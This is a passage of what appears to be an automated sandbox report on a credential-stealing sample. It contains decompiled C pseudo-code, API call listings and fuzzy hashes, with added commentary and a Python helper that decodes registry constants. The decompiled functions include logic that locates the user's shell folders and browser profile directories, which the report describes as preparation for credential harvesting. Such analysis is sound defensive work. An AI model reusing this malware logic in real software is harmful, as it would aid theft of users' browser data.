                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3028965261-0
                                                                                                                                                • Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                • Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
                                                                                                                                                • Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                • Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 98%
                                                                                                                                                			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                                                                				char _v516;
                                                                                                                                                				char _v520;
                                                                                                                                                				intOrPtr _v524;
                                                                                                                                                				intOrPtr _v528;
                                                                                                                                                				intOrPtr _v532;
                                                                                                                                                				intOrPtr _v536;
                                                                                                                                                				intOrPtr _v540;
                                                                                                                                                				intOrPtr _v544;
                                                                                                                                                				void _v546;
                                                                                                                                                				char _v548;
                                                                                                                                                				signed int _v556;
                                                                                                                                                				signed int _v560;
                                                                                                                                                				signed int _v564;
                                                                                                                                                				signed int _v568;
                                                                                                                                                				signed int _v572;
                                                                                                                                                				intOrPtr _v576;
                                                                                                                                                				int _v580;
                                                                                                                                                				short _v582;
                                                                                                                                                				void _v584;
                                                                                                                                                				intOrPtr _v588;
                                                                                                                                                				signed int _v592;
                                                                                                                                                				signed int _v596;
                                                                                                                                                				wchar_t* _v600;
                                                                                                                                                				signed int _v604;
                                                                                                                                                				intOrPtr _v624;
                                                                                                                                                				char _v632;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				signed int _t73;
                                                                                                                                                				signed int _t74;
                                                                                                                                                				signed int _t76;
                                                                                                                                                				signed int _t97;
                                                                                                                                                				signed int _t104;
                                                                                                                                                				int _t124;
                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                				signed int _t127;
                                                                                                                                                				void* _t131;
                                                                                                                                                				intOrPtr* _t151;
                                                                                                                                                				signed int _t153;
                                                                                                                                                				void* _t156;
                                                                                                                                                				void* _t157;
                                                                                                                                                
                                                                                                                                                				_t134 = __ecx;
                                                                                                                                                				_v592 = __ecx;
                                                                                                                                                				_v584 = 0;
                                                                                                                                                				_v582 = 0;
                                                                                                                                                				_v580 = 0;
                                                                                                                                                				_v588 = 0x40f634;
                                                                                                                                                				_t73 = memset( &_v584, 0, 0x44);
                                                                                                                                                				_t126 =  *0x41235c; // 0x0
                                                                                                                                                				_t151 = _a4;
                                                                                                                                                				_t74 = _t73 | 0xffffffff;
                                                                                                                                                				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                				_v572 = _t74;
                                                                                                                                                				_v568 = _t74;
                                                                                                                                                				_v564 = _t74;
                                                                                                                                                				_v560 = _t74;
                                                                                                                                                				_t127 = _t126 - 1;
                                                                                                                                                				_v520 = 0;
                                                                                                                                                				_v600 =  *((intOrPtr*)(_t151 + 0x28));
                                                                                                                                                				if(_t127 < 0) {
                                                                                                                                                					L3:
                                                                                                                                                					_t127 = _t127 | 0xffffffff;
                                                                                                                                                				} else {
                                                                                                                                                					while(1) {
                                                                                                                                                						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
                                                                                                                                                						_pop(_t134);
                                                                                                                                                						if(_t124 == 0) {
                                                                                                                                                							goto L4;
                                                                                                                                                						}
                                                                                                                                                						_t127 = _t127 - 1;
                                                                                                                                                						if(_t127 >= 0) {
                                                                                                                                                							continue;
                                                                                                                                                						} else {
                                                                                                                                                							goto L3;
                                                                                                                                                						}
                                                                                                                                                						goto L4;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L4:
                                                                                                                                                				if(_t127 != 0xffffffff) {
                                                                                                                                                					_t76 = _t127;
                                                                                                                                                				} else {
                                                                                                                                                					_t76 = E00406264(0x412340, _t134, _v600);
                                                                                                                                                				}
                                                                                                                                                				_v556 = _t76;
                                                                                                                                                				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
                                                                                                                                                				_v548 =  *_t151;
                                                                                                                                                				_v544 =  *((intOrPtr*)(_t151 + 4));
                                                                                                                                                				_v540 =  *((intOrPtr*)(_t151 + 8));
                                                                                                                                                				_v536 =  *((intOrPtr*)(_t151 + 0xc));
                                                                                                                                                				_v532 =  *((intOrPtr*)(_t151 + 0x10));
                                                                                                                                                				_t129 = _v592 + 0x84c;
                                                                                                                                                				_v528 =  *((intOrPtr*)(_t151 + 0x14));
                                                                                                                                                				_v596 = _v592 + 0x84c;
                                                                                                                                                				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
                                                                                                                                                				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0); // executed
                                                                                                                                                				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                				_t131 = _v624 + 0x860;
                                                                                                                                                				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t131 + 4)) = 0;
                                                                                                                                                				_v632 = 0;
                                                                                                                                                				_v548 = 0;
                                                                                                                                                				memset( &_v546, 0, 0x1fe);
                                                                                                                                                				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                				_t157 = _t156 + 0x20;
                                                                                                                                                				while(_t97 != 0) {
                                                                                                                                                					E00406264(_t131, _t134,  &_v516);
                                                                                                                                                					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                					_t157 = _t157 + 0x14;
                                                                                                                                                				}
                                                                                                                                                				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
                                                                                                                                                				_t104 = _v596;
                                                                                                                                                				_v604 = _v604 & 0x00000000;
                                                                                                                                                				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
                                                                                                                                                					do {
                                                                                                                                                						if(_v600 != 0) {
                                                                                                                                                							_t166 = _t104 | 0xffffffff;
                                                                                                                                                							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
                                                                                                                                                						}
                                                                                                                                                						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
                                                                                                                                                						_v604 = _v604 + 1;
                                                                                                                                                						_t104 = _v596;
                                                                                                                                                						_t134 = _v604;
                                                                                                                                                					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
                                                                                                                                                				}
                                                                                                                                                				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
                                                                                                                                                				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
                                                                                                                                                				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
                                                                                                                                                			}

Instruction addresses (decompiler listing gutter for the function above; 0x00000000 marks synthetic lines with no address): 0x00401ed6, 0x00401eef, 0x00401ef3, 0x00401ef8, 0x00401efd, 0x00401f01, 0x00401f09, 0x00401f0e, 0x00401f14, 0x00401f17, 0x00401f1a, 0x00401f1d, 0x00401f21, 0x00401f25, 0x00401f29, 0x00401f30, 0x00401f33, 0x00401f37, 0x00401f3b, 0x00401f5c, 0x00401f5c, 0x00000000, 0x00401f3d, 0x00401f4e, 0x00401f56, 0x00401f57, 0x00000000, 0x00000000, 0x00401f59, 0x00401f5a, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00401f5a, 0x00401f3d, 0x00401f5f, 0x00401f62, 0x00401f74, 0x00401f64, 0x00401f6d, 0x00401f6d, 0x00401f7a, 0x00401f81, 0x00401f87, 0x00401f8e, 0x00401f95, 0x00401f9c, 0x00401fa9, 0x00401fb0, 0x00401fb6, 0x00401fba, 0x00401fbe, 0x00401fdb, 0x00401fdf, 0x00401fff, 0x00402007, 0x0040200f, 0x00402012, 0x00402015, 0x00402019, 0x0040201e, 0x0040203a, 0x0040203f, 0x00402070, 0x0040204b, 0x00402068, 0x0040206d, 0x0040206d, 0x00402080, 0x00402085, 0x00402089, 0x00402095, 0x00402097, 0x0040209c, 0x004020a7, 0x004020aa, 0x004020aa, 0x004020cd, 0x004020d2, 0x004020d6, 0x004020da, 0x004020de, 0x00402097, 0x004020ff, 0x0040210a, 0x00402126

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscmp
                                                                                                                                                • String ID: #A$ #A$ #A$@#A$@#A
                                                                                                                                                • API String ID: 243296809-3329557610
                                                                                                                                                • Opcode ID: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                • Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
                                                                                                                                                • Opcode Fuzzy Hash: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
                                                                                                                                                • Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

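The next function listed, E0040DACC, calls RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, ...) with the raw Win32 constants still in place: 0x80000001 is the predefined handle HKEY_CURRENT_USER and 0x20019 is KEY_READ (READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY), so the sample only reads the user's shell folder paths, which is what a stealer does to locate profile directories before the browser-harvesting behaviour flagged in the signature list. The receiving buffer (_v592 plus the 0x206-byte memset over _v590) is 0x208 bytes, i.e. 260 UTF-16 units, which matches the 0x104 (MAX_PATH) limit passed to E0040D6BF; which value name is queried is not visible in this excerpt. The helper below is an added triage aid for turning such constants into names, not code from the sample or from the report; the numeric values are the documented winnt.h / winreg.h definitions and the call in `__main__` is the one from the decompiled function.

```python
"""Decode the raw Win32 registry constants seen in a decompiled RegOpenKeyExW call.

Added triage helper; not code from the sample or from the report. The numeric
values are the documented ones from winreg.h / winnt.h.
"""
from typing import Dict, List

HIVES: Dict[int, str] = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
    0x80000006: "HKEY_DYN_DATA",
}

# Registry-specific rights, then standard/generic rights shared by all securable objects.
RIGHTS = [
    (0x00000001, "KEY_QUERY_VALUE"),
    (0x00000002, "KEY_SET_VALUE"),
    (0x00000004, "KEY_CREATE_SUB_KEY"),
    (0x00000008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00000010, "KEY_NOTIFY"),
    (0x00000020, "KEY_CREATE_LINK"),
    (0x00010000, "DELETE"),
    (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"),
    (0x00080000, "WRITE_OWNER"),
    (0x00100000, "SYNCHRONIZE"),
    (0x01000000, "ACCESS_SYSTEM_SECURITY"),
    (0x02000000, "MAXIMUM_ALLOWED"),
    (0x10000000, "GENERIC_ALL"),
    (0x20000000, "GENERIC_EXECUTE"),
    (0x40000000, "GENERIC_WRITE"),
    (0x80000000, "GENERIC_READ"),
]
# WOW64 view selectors travel in samDesired but are not access rights.
WOW64_VIEW = [(0x00000100, "KEY_WOW64_64KEY"), (0x00000200, "KEY_WOW64_32KEY")]
# Composite masks from winnt.h (SYNCHRONIZE is masked out of all three).
COMPOSITES = {0x00020019: "KEY_READ", 0x00020006: "KEY_WRITE", 0x000F003F: "KEY_ALL_ACCESS"}
# Any of these bits lets the caller change the key or its security descriptor
# (MAXIMUM_ALLOWED is included because it may resolve to write rights at open time).
MODIFY_BITS = (0x00000002 | 0x00000004 | 0x00000020 | 0x00010000 | 0x00040000
               | 0x00080000 | 0x02000000 | 0x10000000 | 0x40000000)


def decode_hive(handle: int) -> str:
    """Name a predefined hive handle; anything else is a key handle from an earlier open."""
    handle &= 0xFFFFFFFF
    return HIVES.get(handle, f"0x{handle:08x} (a key handle, not a predefined hive)")


def decode_access(mask: int) -> Dict[str, object]:
    """Split a samDesired mask into its composite name (if any), individual rights,
    WOW64 view flags and a conservative can_modify verdict."""
    mask &= 0xFFFFFFFF
    view = [name for bit, name in WOW64_VIEW if mask & bit]
    rights_only = mask & ~0x300          # view bits are not rights; drop them
    remaining = rights_only
    flags: List[str] = []
    for bit, name in RIGHTS:
        if remaining & bit:
            flags.append(name)
            remaining &= ~bit
    if remaining:                        # bits winnt.h does not define
        flags.append(f"UNKNOWN_0x{remaining:08x}")
    return {
        "composite": COMPOSITES.get(rights_only),
        "flags": flags,
        "view": view,
        "can_modify": bool(rights_only & MODIFY_BITS),
    }


def describe_regopen(hive: int, subkey: str, mask: int) -> str:
    """One-line analyst summary of a RegOpenKeyExW(hive, subkey, 0, mask, &h) call."""
    d = decode_access(mask)
    rights = d["composite"] or "|".join(d["flags"])
    view = f" [{'|'.join(d['view'])}]" if d["view"] else ""
    intent = "can modify" if d["can_modify"] else "read-only"
    return f"{decode_hive(hive)}\\{subkey} opened with {rights}{view} ({intent})"


if __name__ == "__main__":
    # The call as it appears in the decompiled E0040DACC on this page.
    print(describe_regopen(
        0x80000001,
        r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
        0x20019,
    ))
```

Run it on any RegOpenKeyExW / RegCreateKeyExW argument pair lifted from a listing; a composite name comes back only when the mask is exactly one of the three winnt.h composites (after the WOW64 view bits are removed), otherwise the individual rights are listed so that an odd mask such as KEY_READ | KEY_SET_VALUE is not mistaken for a plain read.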
                                                                                                                                                C-Code - Quality: 84%
			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx; // caller-supplied wide-char buffer that receives the folder path
				E0040DA9D(); // LoadLibraryW("shell32.dll") + GetProcAddress("SHGetSpecialFolderPathW"); result cached at 0x413264
				_t38 =  *0x413264; // 0x76213bb0
				if(_t38 == 0) {
					// Fallback when the shell32 import could not be resolved: read the per-user
					// "Shell Folders" key instead of calling the API.
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72); // reads the value into _v592 (0x104 = MAX_PATH)
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000; // non-zero only if a path was copied out
				}
				E004058FB(); // wraps GetVersionExW (see the API list below)
				// SHGetSpecialFolderPathW(NULL, __ebx, 0x1c, FALSE); 0x1c = CSIDL_LOCAL_APPDATA,
				// i.e. %LOCALAPPDATA%, where Chromium-based browser profiles live.
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}
Instruction addresses for the statements above, in source order: 0x0040dacc, 0x0040dacc, 0x0040dad6, 0x0040dadd, 0x0040dae3, 0x0040db04, 0x0040db0b, 0x0040db13, 0x0040db2f, 0x0040db36, 0x0040db44, 0x0040db4e, 0x0040db54, 0x0040db5d, 0x00000000, 0x0040db69, 0x0040dae5, 0x0040daef, 0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
                                                                                                                                                  • Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0
                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB5D
                                                                                                                                                  • Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
                                                                                                                                                • API String ID: 2249099915-3068728944
                                                                                                                                                • Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                • Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
                                                                                                                                                • Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
                                                                                                                                                • Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                			E0040BB15(void* __eflags) {
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                				struct HICON__* _t42;
                                                                                                                                                				void* _t48;
                                                                                                                                                				intOrPtr* _t50;
                                                                                                                                                				intOrPtr* _t57;
                                                                                                                                                				intOrPtr* _t59;
                                                                                                                                                				void* _t60;
                                                                                                                                                
                                                                                                                                                				_t59 =  *((intOrPtr*)(_t60 + 0xc));
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x208)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x244)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x274)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438; // constant pointer stored as the object's first field (likely a vtable)
                                                                                                                                                				_t35 = _t59 + 0x6ac;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x694)) = 0;
                                                                                                                                                				_t50 = _t59 + 0x6c4;
                                                                                                                                                				 *((intOrPtr*)(_t35 + 0xc)) = 0;
                                                                                                                                                				 *_t35 = 0;
                                                                                                                                                				 *((intOrPtr*)(_t35 + 4)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
                                                                                                                                                				 *((intOrPtr*)(_t35 + 8)) = 0;
                                                                                                                                                				E0040133A(_t50);
                                                                                                                                                				 *_t50 = 0x40f7b8;
                                                                                                                                                				_t37 = E0040167A(_t50 + 0x40);
                                                                                                                                                				 *((short*)(_t50 + 0x80)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
                                                                                                                                                				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
                                                                                                                                                				_push(0x2238);
                                                                                                                                                				 *((intOrPtr*)(_t50 + 4)) = 0x72;
                                                                                                                                                				 *((intOrPtr*)(_t50 + 0x74)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t50 + 0x78)) = 0;
                                                                                                                                                				L0040E038(); // executed
                                                                                                                                                				if(_t37 == 0) {
                                                                                                                                                					_t37 = 0;
                                                                                                                                                					__eflags = 0;
                                                                                                                                                				} else {
                                                                                                                                                					 *((intOrPtr*)(_t37 + 0x14)) = 1;
                                                                                                                                                					 *((short*)(_t37 + 0x18)) = 0;
                                                                                                                                                					 *((short*)(_t37 + 0x228)) = 0;
                                                                                                                                                					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
                                                                                                                                                					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
                                                                                                                                                					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
                                                                                                                                                					 *0x412b14 = _t37;
                                                                                                                                                				}
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
                                                                                                                                                				L0040E038();
                                                                                                                                                				_t63 = _t37;
                                                                                                                                                				_t48 = 0xc00;
                                                                                                                                                				if(_t37 == 0) {
                                                                                                                                                					_t38 = 0;
                                                                                                                                                					__eflags = 0;
                                                                                                                                                				} else {
                                                                                                                                                					_t38 = E0040219B(_t37, _t63);
                                                                                                                                                				}
                                                                                                                                                				_t57 = _t59 + 0x27c;
                                                                                                                                                				 *_t57 = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
                                                                                                                                                				E00401000(_t59 + 0x492, _t48, 0x412054);
                                                                                                                                                				 *_t57 = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x284)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x280)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x278)) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed; icon resource ID 0x65 (101) from the main module
                                                                                                                                                				E00401879(_t59, _t42);
                                                                                                                                                				return _t59;
                                                                                                                                                			}
Instruction addresses for the statements above, in source order: 0x0040bb19, 0x0040bb1e, 0x0040bb24, 0x0040bb2a, 0x0040bb30, 0x0040bb36, 0x0040bb3d, 0x0040bb43, 0x0040bb4a, 0x0040bb52, 0x0040bb55, 0x0040bb57, 0x0040bb5a, 0x0040bb61, 0x0040bb64, 0x0040bb6c, 0x0040bb72, 0x0040bb7a, 0x0040bb81, 0x0040bb87, 0x0040bb8d, 0x0040bb93, 0x0040bb98, 0x0040bb9f, 0x0040bba2, 0x0040bba5, 0x0040bbad, 0x0040bbd6, 0x0040bbd6, 0x0040bbaf, 0x0040bbaf, 0x0040bbb2, 0x0040bbb6, 0x0040bbbd, 0x0040bbc3, 0x0040bbc9, 0x0040bbcf, 0x0040bbcf, 0x0040bbdd, 0x0040bbe3, 0x0040bbe8, 0x0040bbea, 0x0040bbeb, 0x0040bbf4, 0x0040bbf4, 0x0040bbed, 0x0040bbed, 0x0040bbed, 0x0040bbf6, 0x0040bbfc, 0x0040bc09, 0x0040bc0f, 0x0040bc17, 0x0040bc19, 0x0040bc1f, 0x0040bc25, 0x0040bc2b, 0x0040bc3a, 0x0040bc43, 0x0040bc4e

APIs
  • Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C
  • Part of subcall function 0040167A: memset.MSVCRT ref: 00401690
• ??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
• ??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
• GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
• LoadIconW.USER32(00000000,00000065), ref: 0040BC3A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ??2@memset$HandleIconLoadModule
• String ID: T A
• API String ID: 2596266805-11209434
• Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
• Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
• Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
• Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 20%
E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
	signed short _v131076;
	long _t17;

	_t25 = __esi;
	E0040E340(0x20000, __ecx);
	if(_a4 == 0) {
		_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
		return _t17;
	} else {
		if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
			_push(_a24);
		} else {
			_v131076 = _v131076 & 0x00000000;
			_push(__esi);
			_push(L"\"%s\"");
			_push(0xfffe);
			_push( &_v131076);
			L0040DFD6();
			_push(_a24);
			_push( &_v131076);
		}
		return WritePrivateProfileStringW(_a8, _a12, ??, ??);
	}
}

APIs
• wcschr.MSVCRT ref: 0040D585
• _snwprintf.MSVCRT ref: 0040D5AA
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
• GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
• Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
• Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
• Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
	int _t8;
	struct HINSTANCE__* _t9;

	if( *0x4136f4 == 0) {
		_t9 = GetModuleHandleW(L"kernel32.dll");
		if(_t9 != 0) {
			 *0x4136f4 = 1;
			 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
		}
	}
	if( *0x4136f8 == 0) {
